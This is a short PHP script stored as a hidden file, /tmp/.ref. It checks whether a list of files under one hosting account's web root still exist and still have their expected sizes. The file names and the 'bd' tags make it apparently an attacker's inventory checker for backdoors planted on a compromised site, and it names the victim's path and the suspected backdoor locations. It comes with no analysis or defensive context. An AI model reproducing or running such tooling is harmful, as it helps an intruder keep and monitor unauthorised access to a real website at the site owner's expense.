File: //tmp/.ref
<?php $r = '/home/vitanhod/multig.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1268950@@51",
"/orderemail.php"=>"bd@@1269270@@7",
"/includes/config.php"=>"bd@@1269377@@9",
"/includes/configOnline.php"=>"bd@@1269096@@98",
"/includes/mod_banners.php"=>"bd@@1276542@@82",
"/nggshow.php"=>"bd@@1269470@@999",
"/img/phocatext.php"=>"bd@@1276411@@32",
"/includes/mod.php"=>"bd@@1309759@@1036",
"/nggshow.php"=>"bd@@1276296@@30",
"/includes/mod_banners.php"=>"bd@@1268441@@931",
"/img/phocatext.php"=>"bd@@1269491@@950"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');